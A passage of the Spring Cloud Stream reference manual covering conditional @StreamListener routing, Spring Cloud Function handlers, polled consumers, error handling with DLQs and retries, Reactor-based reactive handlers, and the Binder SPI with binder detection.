Sink.INPUT, condition = \"headers['type']=='bacall'\")\n public void receiveBacall(@Payload BacallPojo bacallPojo) {\n \/\/ handle the message\n }\n}\n----\n\n
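For these conditions to match, the producing side must set the `type` header on each message. The following is a minimal sketch of publishing such a message (the autowired `input` channel is an assumption for illustration):\n\n[source,java]\n----\n\/\/ hypothetical test snippet: publish a message that matches the 'bogey' condition\ninput.send(MessageBuilder.withPayload(new BogeyPojo())\n        .setHeader(\"type\", \"bogey\")\n        .build());\n----\n\n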
*Content Type Negotiation in the Context of `condition`*\n\nIt is important to understand some of the mechanics behind content-based routing using the `condition` argument of `@StreamListener`, especially in the context of the type of the message as a whole.\nIt may also help if you familiarize yourself with the <<Content Type Negotiation>> before you proceed.\n\nConsider the following scenario:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class CatsAndDogs {\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Dog'\")\n public void bark(Dog dog) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Cat'\")\n public void purr(Cat cat) {\n \/\/ handle the message\n }\n}\n----\n\nThe preceding code is perfectly valid. It compiles and deploys without any issues, yet it never produces the result you expect.\nThat is because you are testing something that does not yet exist in the state you expect: at the point where the condition is evaluated, the payload of the message has not yet been converted from the\nwire format (`byte[]`) to the desired type.\nIn other words, it has not yet gone through the type conversion process described in <<Content Type Negotiation>>.\n\nSo, unless you use a SpEL expression that evaluates raw data (for example, the value of the first byte in the byte array), use message header-based expressions\n(such as `condition = \"headers['type']=='dog'\"`).\n\nNOTE: At the moment, dispatching through `@StreamListener` conditions is supported only for channel-based binders (not for reactive programming support).\n\n[[_spring_cloud_function]]\n==== Spring Cloud Function support\n\nSince Spring Cloud Stream v2.1, another alternative for defining _stream handlers_ and _sources_ is to use built-in\nsupport for https:\/\/cloud.spring.io\/spring-cloud-function\/[Spring Cloud Function], where they can be expressed as beans of\ntype `java.util.function.[Supplier\/Function\/Consumer]`.\n\nTo specify which functional bean to bind to the external destination(s) exposed by the bindings, you must provide the `spring.cloud.stream.function.definition` property.\n\nHere is an example of a Processor application exposing a message handler as a `java.util.function.Function`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyFunctionBootApp {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyFunctionBootApp.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\nIn the preceding example, we simply define a bean of type `java.util.function.Function` called _toUpperCase_ and identify it as the bean to be used as the message handler,\nwhose 'input' and 'output' must be bound to the external destinations exposed by the Processor binding.\n\nBelow are examples of simple functional applications supporting Source, Processor, and Sink.\n\nHere is an example of a Source application defined as a `java.util.function.Supplier`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic static class SourceFromSupplier {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SourceFromSupplier.class, \"--spring.cloud.stream.function.definition=date\");\n\t}\n\t@Bean\n\tpublic Supplier<Date> date() {\n\t\treturn () -> new Date(12345L);\n\t}\n}\n----\n\nHere is an example of a Processor application defined as a `java.util.function.Function`:\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic static class ProcessorFromFunction {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(ProcessorFromFunction.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\n\nHere is an example of a Sink application defined as a `java.util.function.Consumer`:\n[source,java]\n----\n@EnableAutoConfiguration\n@EnableBinding(Sink.class)\npublic static class SinkFromConsumer {\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SinkFromConsumer.class, \"--spring.cloud.stream.function.definition=sink\");\n\t}\n\t@Bean\n\tpublic Consumer<String> sink() {\n\t\treturn System.out::println;\n\t}\n}\n----\n\n
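In these examples, the `spring.cloud.stream.function.definition` property is passed as a command-line argument for brevity. Since it is a regular Spring Boot configuration property, it can equally well be set in `application.properties`, as the following sketch shows:\n\n[source,text]\n----\nspring.cloud.stream.function.definition=toUpperCase\n----\n\n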
===== Functional Composition\n\nUsing this programming model, you can also benefit from functional composition, where you can dynamically compose complex handlers from a set of simple functions.\nAs an example, let's add the following function bean to the application defined above:\n[source,java]\n----\n@Bean\npublic Function<String, String> wrapInQuotes() {\n\treturn s -> \"\\\"\" + s + \"\\\"\";\n}\n----\nand modify the `spring.cloud.stream.function.definition` property to reflect your intention to compose a new function from both 'toUpperCase' and 'wrapInQuotes'.\nTo do that, Spring Cloud Function allows you to use the `|` (pipe) symbol. So, to finish our example, our property now looks like this:\n\n[source,text]\n----\n--spring.cloud.stream.function.definition=toUpperCase|wrapInQuotes\n----\n\n[[spring-cloud-streams-overview-using-polled-consumers]]\n==== Using Polled Consumers\n\n===== Overview\n\nWhen using polled consumers, you poll the `PollableMessageSource` on demand.\nConsider the following example of a polled consumer:\n\n[source,java]\n----\npublic interface PolledConsumer {\n\n @Input\n PollableMessageSource destIn();\n\n @Output\n MessageChannel destOut();\n\n}\n----\n\nGiven the polled consumer in the preceding example, you might use it as follows:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource destIn, MessageChannel destOut) {\n return args -> {\n while (someCondition()) {\n try {\n if (!destIn.poll(m -> {\n String newPayload = ((String) m.getPayload()).toUpperCase();\n destOut.send(new GenericMessage<>(newPayload));\n })) {\n Thread.sleep(1000);\n }\n }\n catch (Exception e) {\n \/\/ handle failure\n }\n }\n };\n}\n----\n\nThe `PollableMessageSource.poll()` method takes a `MessageHandler` argument (often a lambda expression, as shown here).\nIt returns `true` if the message was received and successfully processed.\n\nAs with message-driven consumers, if the `MessageHandler` throws an exception, messages are published to error channels, as discussed in \"`<<binder-error-channels>>`\".\n\nNormally, the `poll()` method acknowledges the message when the `MessageHandler` exits.\nIf the method exits abnormally, the message is rejected (not re-queued), but see <<polled-errors>>.\nYou can override that behavior by taking responsibility for the acknowledgment, as shown in the following example:\n\n[source,java]\n----\n@Bean\npublic ApplicationRunner poller(PollableMessageSource dest1In, MessageChannel dest2Out) {\n return args -> {\n while (someCondition()) {\n if (!dest1In.poll(m -> {\n StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).noAutoAck();\n \/\/ e.g. hand off to another thread which can perform the ack\n \/\/ or acknowledge(Status.REQUEUE)\n\n })) {\n Thread.sleep(1000);\n }\n }\n };\n}\n----\n\nIMPORTANT: You must `ack` (or `nack`) the message at some point, to avoid resource leaks.\n\nIMPORTANT: Some messaging systems (such as Apache Kafka) maintain a simple offset in a log. If a delivery fails and is re-queued with `StaticMessageHeaderAccessor.getAcknowledgmentCallback(m).acknowledge(Status.REQUEUE);`, any later successfully ack'd messages are redelivered.\n\n
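Instead of the `while` loop shown earlier, polling can also be driven by a scheduling mechanism. The following is a minimal sketch (assuming scheduling is enabled with `@EnableScheduling` and the `PolledConsumer` interface from the overview is bound; the five-second delay is an arbitrary illustration):\n\n[source,java]\n----\n@Autowired\nprivate PollableMessageSource destIn;\n\n\/\/ hypothetical scheduled poll; each invocation processes at most one message\n@Scheduled(fixedDelay = 5000)\npublic void pollOnSchedule() {\n    destIn.poll(m -> System.out.println(\"Received: \" + m.getPayload()));\n}\n----\n\n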
There is also an overloaded `poll` method, for which the definition is as follows:\n\n[source,java]\n----\npoll(MessageHandler handler, ParameterizedTypeReference<?> type)\n----\n\nThe `type` is a conversion hint that allows the incoming message payload to be converted, as shown in the following example:\n\n[source,java]\n----\nboolean result = pollableSource.poll(received -> {\n    Map<String, Foo> payload = (Map<String, Foo>) received.getPayload();\n    ...\n}, new ParameterizedTypeReference<Map<String, Foo>>() {});\n----\n\n[[polled-errors]]\n===== Handling Errors\n\nBy default, an error channel is configured for the pollable source; if the callback throws an exception, an `ErrorMessage` is sent to the error channel (`<destination>.<group>.errors`); this error channel is also bridged to the global Spring Integration `errorChannel`.\n\nYou can subscribe to either error channel with a `@ServiceActivator` to handle errors; without a subscription, the error is simply logged and the message is acknowledged as successful.\nIf the error channel service activator throws an exception, the message is rejected (by default) and is not redelivered.\nIf the service activator throws a `RequeueCurrentMessageException`, the message is requeued at the broker and is retrieved again on a subsequent poll.\n\nIf the listener throws a `RequeueCurrentMessageException` directly, the message is requeued, as discussed above, and is not sent to the error channels.\n\n
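The following is a minimal sketch of such a subscription (the destination and group names, `dest` and `myGroup`, are assumptions for illustration):\n\n[source,java]\n----\n\/\/ subscribe to the pollable source's error channel\n@ServiceActivator(inputChannel = \"dest.myGroup.errors\")\npublic void handlePollingError(ErrorMessage errorMessage) {\n    \/\/ the payload of an ErrorMessage is the exception thrown by the callback\n    System.out.println(\"Polling failed: \" + errorMessage.getPayload());\n}\n----\n\n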
[[spring-cloud-stream-overview-error-handling]]\n=== Error Handling\n\nErrors happen, and Spring Cloud Stream provides several flexible mechanisms to handle them.\nThe error handling comes in two flavors:\n\n * *application:* The error handling is done within the application (custom error handler).\n\n * *system:* The error handling is delegated to the binder (re-queue, DLQ, and others). Note that the techniques are dependent on binder implementation and the\n capability of the underlying messaging middleware.\n\nSpring Cloud Stream uses the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library to facilitate successful message processing. See <<Retry Template>> for more details.\nHowever, when all attempts fail, the exceptions thrown by the message handlers are propagated back to the binder. At that point, the binder invokes a custom error handler or communicates\nthe error back to the messaging system (re-queue, DLQ, and others).\n\n==== Application Error Handling\n\nThere are two types of application-level error handling. Errors can be handled at each binding subscription, or a global handler can handle all of the binding subscription errors. Let's review the details.\n\n.A Spring Cloud Stream Sink Application with Custom and Global Error Handlers\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/custom_vs_global_error_channels.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nFor each input binding, Spring Cloud Stream creates a dedicated error channel whose name follows the convention `<destinationName>.errors`.\n\nNOTE: The `<destinationName>` consists of the name of the binding (such as `input`) and the name of the group (such as `myGroup`).\n\nConsider the following:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\n[source,java]\n----\n@StreamListener(Sink.INPUT) \/\/ destination name 'input.myGroup'\npublic void handle(Person value) {\n\tthrow new RuntimeException(\"BOOM!\");\n}\n\n@ServiceActivator(inputChannel = Processor.INPUT + \".myGroup.errors\") \/\/ channel name 'input.myGroup.errors'\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nIn the preceding example, the destination name is `input.myGroup` and the dedicated error channel name is `input.myGroup.errors`.\n\nNOTE: The use of the `@StreamListener` annotation is intended specifically to define bindings that bridge internal channels and external destinations. Given that the destination-specific\nerror channel does NOT have an associated external destination, such a channel is a prerogative of Spring Integration (SI). This means that the handler\nfor such a destination must be defined by using one of the SI handler annotations (such as `@ServiceActivator` or `@Transformer`).\n\nNOTE: If `group` is not specified, an anonymous group is used (something like `input.anonymous.2K37rb06Q6m2r51-SPIDDQ`), which is not suitable for error-handling\nscenarios, since you do not know what it is going to be until the destination is created.\n\nAlso, in the event you are binding to an existing destination, such as:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.destination=myFooDestination\nspring.cloud.stream.bindings.input.group=myGroup\n----\n\nthe full destination name is `myFooDestination.myGroup`, and the dedicated error channel name is `myFooDestination.myGroup.errors`.\n\nBack to the example...\n\nThe `handle(..)` method, which subscribes to the channel named `input`, throws an exception. Given that there is also a subscriber to the error channel `input.myGroup.errors`,\nall error messages are handled by that subscriber.\n\nIf you have multiple bindings, you may want to have a single error handler. Spring Cloud Stream automatically provides support for\na _global error channel_ by bridging each individual error channel to the channel named `errorChannel`, allowing a single subscriber to handle all errors,\nas shown in the following example:\n\n[source,java]\n----\n@StreamListener(\"errorChannel\")\npublic void error(Message<?> message) {\n\tSystem.out.println(\"Handling ERROR: \" + message);\n}\n----\n\nThis may be a convenient option if the error handling logic is the same regardless of which handler produced the error.\n\n==== System Error Handling\n\nSystem-level error handling implies that the errors are communicated back to the messaging system and, given that not every messaging system\nis the same, the capabilities may differ from binder to binder.\n\nThat said, in this section we explain the general idea behind system-level error handling and use the Rabbit binder as an example.\n\nNOTE: The Kafka binder provides similar support, although some configuration properties do differ. Also, for more details and configuration options, see the individual binder's documentation.\n\n
If no internal error handlers are configured, the errors propagate to the binders, and the binders subsequently propagate those errors back to the messaging system.\nDepending on the capabilities of the messaging system, such a system may _drop_ the message, _re-queue_ the message for re-processing, or _send the failed message to the DLQ_.\nBoth Rabbit and Kafka support these concepts. However, other binders may not, so refer to your individual binder's documentation for details on supported system-level\nerror-handling options.\n\n===== Drop Failed Messages\n\nBy default, if no additional system-level configuration is provided, the messaging system drops the failed message.\nWhile acceptable in some cases, for most cases it is not, and we need some recovery mechanism to avoid message loss.\n\n===== DLQ - Dead Letter Queue\n\nDLQ allows failed messages to be sent to a special destination: the _Dead Letter Queue_.\n\nWhen configured, failed messages are sent to this destination for subsequent re-processing or auditing and reconciliation.\n\nFor example, continuing the previous example, to set up the DLQ with the Rabbit binder, you need to set the following property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.auto-bind-dlq=true\n----\n\nKeep in mind that, in the above property, `input` corresponds to the name of the input destination binding.\nThe `consumer` indicates that it is a consumer property, and `auto-bind-dlq` instructs the binder to configure a DLQ for the `input`\ndestination, which results in an additional Rabbit queue named `input.myGroup.dlq`.\n\nOnce configured, all failed messages are routed to this queue with an error message similar to the following:\n\n[source,text]\n----\ndelivery_mode:\t1\nheaders:\nx-death:\ncount:\t1\nreason:\trejected\nqueue:\tinput.hello\ntime:\t1522328151\nexchange:\nrouting-keys:\tinput.myGroup\nPayload {\"name\":\"Bob\"}\n----\n\nAs you can see from the above, your original message is preserved for further actions.\n\nHowever, one thing you may have noticed is that there is limited information on the original issue with the message processing. For example, you do not see a stack\ntrace corresponding to the original error.\n
To get more relevant information about the original error, you must set an additional property:\n\n[source,text]\n----\nspring.cloud.stream.rabbit.bindings.input.consumer.republish-to-dlq=true\n----\n\nDoing so forces the internal error handler to intercept the error message and add additional information to it before publishing it to the DLQ.\nOnce configured, you can see that the error message contains more information relevant to the original error, as follows:\n\n[source,text]\n----\ndelivery_mode:\t2\nheaders:\nx-original-exchange:\nx-exception-message:\thas an error\nx-original-routingKey:\tinput.myGroup\nx-exception-stacktrace:\torg.springframework.messaging.MessageHandlingException: nested exception is\n org.springframework.messaging.MessagingException: has an error, failedMessage=GenericMessage [payload=byte[15],\n headers={amqp_receivedDeliveryMode=NON_PERSISTENT, amqp_receivedRoutingKey=input.hello, amqp_deliveryTag=1,\n deliveryAttempt=3, amqp_consumerQueue=input.hello, amqp_redelivered=false, id=a15231e6-3f80-677b-5ad7-d4b1e61e486e,\n amqp_consumerTag=amq.ctag-skBFapilvtZhDsn0k3ZmQg, contentType=application\/json, timestamp=1522327846136}]\n at org.spring...integ...han...MethodInvokingMessageProcessor.processMessage(MethodInvokingMessageProcessor.java:107)\n at. . . . .\nPayload {\"name\":\"Bob\"}\n----\n\nThis effectively combines application-level and system-level error handling to further assist with downstream troubleshooting mechanics.\n\n===== Re-queue Failed Messages\n\nAs mentioned earlier, the currently supported binders (Rabbit and Kafka) rely on `RetryTemplate` to facilitate successful message processing. See <<Retry Template>> for details.\nHowever, for cases when the `max-attempts` property is set to `1`, internal reprocessing of the message is disabled. At this point, you can facilitate message re-processing (retries)\nby instructing the messaging system to re-queue the failed message.\n
Once re-queued, the failed message is sent back to the original handler, essentially creating a retry loop.\n\nThis option may be feasible for cases where the nature of the error is related to some sporadic yet short-term unavailability of some resource.\n\nTo accomplish that, you must set the following properties:\n\n[source,text]\n----\nspring.cloud.stream.bindings.input.consumer.max-attempts=1\nspring.cloud.stream.rabbit.bindings.input.consumer.requeue-rejected=true\n----\n\nIn the preceding example, setting `max-attempts` to `1` essentially disables internal retries, and `requeue-rejected` (short for _requeue rejected messages_) is set to `true`.\nOnce set, the failed message is resubmitted to the same handler and loops continuously until the handler throws an `AmqpRejectAndDontRequeueException`,\nessentially allowing you to build your own retry logic within the handler itself.\n\n==== Retry Template\n\nThe `RetryTemplate` is part of the https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] library.\nWhile it is out of the scope of this document to cover all of the capabilities of the `RetryTemplate`, we mention the following consumer properties that are specifically related to\nthe `RetryTemplate`:\n\nmaxAttempts::\nThe number of attempts to process the message.\n+\nDefault: 3.\nbackOffInitialInterval::\nThe backoff initial interval on retry.\n+\nDefault: 1000 milliseconds.\nbackOffMaxInterval::\nThe maximum backoff interval.\n+\nDefault: 10000 milliseconds.\nbackOffMultiplier::\nThe backoff multiplier.\n+\nDefault: 2.0.\ndefaultRetryable::\nWhether exceptions thrown by the listener that are not listed in the `retryableExceptions` are retryable.\n+\nDefault: `true`.\nretryableExceptions::\nA map of Throwable class names in the key and a boolean in the value.\nSpecify those exceptions (and subclasses) that will or won't be retried.\nAlso see `defaultRetryable`.\nExample: `spring.cloud.stream.bindings.input.consumer.retryable-exceptions.java.lang.IllegalStateException=false`.\n+\nDefault: empty.\n\nWhile the preceding settings are sufficient for the majority of customization requirements, they may not satisfy certain complex requirements, at which\npoint you may want to provide your own instance of the `RetryTemplate`. To do so, configure it as a bean in your application configuration. The application-provided\ninstance overrides the one provided by the framework. Also, to avoid conflicts, you must qualify the instance of the `RetryTemplate` that you want the binder to use\nas `@StreamRetryTemplate`. For example:\n\n[source,java]\n----\n@StreamRetryTemplate\npublic RetryTemplate myRetryTemplate() {\n return new RetryTemplate();\n}\n----\nAs you can see from the above example, you do not need to annotate it with `@Bean`, since `@StreamRetryTemplate` is a qualified `@Bean`.\n\n[[spring-cloud-stream-overview-reactive-programming-support]]\n=== Reactive Programming Support\n\nSpring Cloud Stream also supports the use of reactive APIs, where incoming and outgoing data is handled as continuous data flows.\nSupport for reactive APIs is available through `spring-cloud-stream-reactive`, which needs to be added explicitly to your project.\n\n
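For example, with Maven, the following dependency brings in the reactive support (assuming the version is managed by the Spring Cloud release train BOM, as in the other dependency examples in this manual):\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-reactive<\/artifactId>\n<\/dependency>\n----\n\n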
The programming model with reactive APIs is declarative. Instead of specifying how each individual message should be handled, you can use operators that describe functional transformations from inbound to outbound data flows.\n\nAt present, Spring Cloud Stream supports only the https:\/\/projectreactor.io\/[Reactor API].\nIn the future, we intend to support a more generic model based on Reactive Streams.\n\nThe reactive programming model also uses the `@StreamListener` annotation for setting up reactive handlers.\nThe differences are that:\n\n* The `@StreamListener` annotation must not specify an input or output, as they are provided as arguments and return values from the method.\n* The arguments of the method must be annotated with `@Input` and `@Output`, indicating which input or output the incoming and outgoing data flows connect to, respectively.\n* The return value of the method, if any, is annotated with `@Output`, indicating the output where data should be sent.\n\nNOTE: Reactive programming support requires Java 1.8.\n\nNOTE: As of Spring Cloud Stream 1.1.1 and later (starting with release train Brooklyn.SR2), reactive programming support requires the use of Reactor 3.0.4.RELEASE and higher.\nEarlier Reactor versions (including 3.0.1.RELEASE, 3.0.2.RELEASE, and 3.0.3.RELEASE) are not supported.\n`spring-cloud-stream-reactive` transitively retrieves the proper version, but it is possible for the project structure to manage the version of `io.projectreactor:reactor-core` to an earlier release, especially when using Maven.\nThis is the case for projects generated by using Spring Initializr with Spring Boot 1.x, which overrides the Reactor version to `2.0.8.RELEASE`.\nIn such cases, you must ensure that the proper version of the artifact is used.\nYou can do so by adding a direct dependency on `io.projectreactor:reactor-core` with a version of `3.0.4.RELEASE` or later to your project.\n\nNOTE: The use of the term \"`reactive`\" currently refers to the reactive APIs being used and not to the execution model being reactive (that is, the bound endpoints still use a 'push' rather than a 'pull' model). While some backpressure support is provided by the use of Reactor, we do intend, in a future release, to support entirely reactive pipelines by the use of native reactive clients for the connected middleware.\n\n===== Reactor-based Handlers\n\nA Reactor-based handler can have the following argument types:\n\n* For arguments annotated with `@Input`, it supports the Reactor `Flux` type.\nThe parameterization of the inbound Flux follows the same rules as in the case of individual message handling: It can be the entire `Message`, a POJO that can be the `Message` payload, or a POJO that is the result of a transformation based on the `Message` content-type header. Multiple inputs can be provided.\n* For arguments annotated with `@Output`, it supports the `FluxSender` type, which connects a `Flux` produced by the method with an output. Generally speaking, specifying outputs as arguments is only recommended when the method can have multiple outputs.\n\nA Reactor-based handler supports a return type of `Flux`. In that case, it must be annotated with `@Output`. We recommend using the return value of the method when a single output `Flux` is available.\n\n
The following example shows a Reactor-based `Processor`:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n @Output(Processor.OUTPUT)\n public Flux<String> receive(@Input(Processor.INPUT) Flux<String> input) {\n return input.map(s -> s.toUpperCase());\n }\n}\n----\n\nThe same processor using output arguments looks like the following example:\n\n[source, java]\n----\n@EnableBinding(Processor.class)\n@EnableAutoConfiguration\npublic static class UppercaseTransformer {\n\n @StreamListener\n public void receive(@Input(Processor.INPUT) Flux<String> input,\n @Output(Processor.OUTPUT) FluxSender output) {\n output.send(input.map(s -> s.toUpperCase()));\n }\n}\n----\n\n===== Reactive Sources\n\nSpring Cloud Stream reactive support also provides the ability to create reactive sources through the `@StreamEmitter` annotation.\nBy using the `@StreamEmitter` annotation, a regular source may be converted to a reactive one.\n`@StreamEmitter` is a method-level annotation that marks a method to be an emitter to outputs declared with `@EnableBinding`.\nYou cannot use the `@Input` annotation along with `@StreamEmitter`, as the methods marked with this annotation are not listening for any input. Rather, methods marked with `@StreamEmitter` generate output.\nFollowing the same programming model used in `@StreamListener`, `@StreamEmitter` also allows flexible ways of using the `@Output` annotation, depending on whether the method has any arguments, a return type, and other considerations.\n\nThe remainder of this section contains examples of using the `@StreamEmitter` annotation in various styles.\n\nThe following example emits the `Hello, World` message every millisecond and publishes to a Reactor `Flux`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public Flux<String> emit() {\n return Flux.intervalMillis(1)\n .map(l -> \"Hello World\");\n }\n}\n----\n\nIn the preceding example, the resulting messages in the `Flux` are sent to the output channel of the `Source`.\n\nThe next example is another flavor of a `@StreamEmitter` that sends a Reactor `Flux`.\nInstead of returning a `Flux`, the following method uses a `FluxSender` to programmatically send a `Flux` from a source:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n public void emit(FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe next example is exactly the same as the preceding snippet in functionality and style.\nHowever, instead of using an explicit `@Output` annotation on the method, it uses the annotation on the method parameter:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n public void emit(@Output(Source.OUTPUT) FluxSender output) {\n output.send(Flux.intervalMillis(1)\n .map(l -> \"Hello World\"));\n }\n}\n----\n\nThe last example in this section is yet another flavor of writing reactive sources by using the Reactive Streams Publisher API and taking advantage of the support for it in https:\/\/github.com\/spring-projects\/spring-integration-java-dsl\/wiki\/Spring-Integration-Java-DSL-Reference[Spring Integration Java DSL].\n
The `Publisher` in the following example still uses Reactor `Flux` under the hood, but, from an application perspective, that is transparent to the user, who needs only Reactive Streams and the Java DSL for Spring Integration:\n\n[source, java]\n----\n@EnableBinding(Source.class)\n@EnableAutoConfiguration\npublic static class HelloWorldEmitter {\n\n @StreamEmitter\n @Output(Source.OUTPUT)\n @Bean\n public Publisher<Message<String>> emit() {\n return IntegrationFlows.from(() ->\n new GenericMessage<>(\"Hello World\"),\n e -> e.poller(p -> p.fixedDelay(1)))\n .toReactivePublisher();\n }\n}\n----\n\n[[spring-cloud-stream-overview-binders]]\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\nThe following image shows the general relationship of producers and consumers:\n\n.Producers and Consumers\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/producers-consumers.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nA producer is any component that sends messages to a channel.\nThe channel can be bound to an external message broker with a `Binder` implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer sends messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA consumer is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (that is, it follows normal publish-subscribe semantics).\nIf there are multiple consumer instances bound with the same group name, then messages are load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each group (that is, it follows normal queueing semantics).\n\n[[spring-cloud-stream-overview-binder-api]]\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the-box utility classes, and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface, which is a strategy for connecting inputs and outputs to external middleware. The following listing shows the definition of the `Binder` interface:\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n Binding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n Binding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* Input and output bind targets. As of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future.\n* Extended consumer and producer properties, allowing specific Binder implementations to add supplemental properties that can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following:\n\n* A class that implements the `Binder` interface.\n* A Spring `@Configuration` class that creates a bean of type `Binder` along with the middleware connection infrastructure.\n* A `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, as shown in the following example:\n+\n[source]\n----\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n----\n\n
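To make the shape of the SPI concrete, the following is a minimal sketch of a custom `Binder` implementation (the class name and the no-op method bodies are hypothetical; a real implementation would connect the bind targets to the middleware and return live `Binding` instances):\n\n[source,java]\n----\nimport org.springframework.cloud.stream.binder.Binder;\nimport org.springframework.cloud.stream.binder.Binding;\nimport org.springframework.cloud.stream.binder.ConsumerProperties;\nimport org.springframework.cloud.stream.binder.ProducerProperties;\nimport org.springframework.messaging.MessageChannel;\n\npublic class MyMiddlewareBinder implements Binder<MessageChannel, ConsumerProperties, ProducerProperties> {\n\n    @Override\n    public Binding<MessageChannel> bindConsumer(String name, String group,\n            MessageChannel inboundBindTarget, ConsumerProperties consumerProperties) {\n        \/\/ connect the middleware destination 'name' to inboundBindTarget here\n        throw new UnsupportedOperationException(\"sketch only\");\n    }\n\n    @Override\n    public Binding<MessageChannel> bindProducer(String name,\n            MessageChannel outboundBindTarget, ProducerProperties producerProperties) {\n        \/\/ route messages sent to outboundBindTarget to the middleware destination 'name' here\n        throw new UnsupportedOperationException(\"sketch only\");\n    }\n}\n----\n\n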
=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream automatically uses it.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\nFor the specific Maven coordinates of other binder dependencies, see the documentation of that binder implementation.\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders` file, which is a simple properties file, as shown in the following example:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (such as Kafka), and custom binder implementations are expected to provide them as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (for example, `spring.cloud.stream.defaultBinder=rabbit`), or individually, by configuring the binder on each channel binding.\nFor instance, a processor application (that has channels named `input` and `output` for read and write, respectively) that reads from Kafka and writes to RabbitMQ can specify the following configuration:\n\n[source]\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n[[multiple-systems]]\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath is created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\n
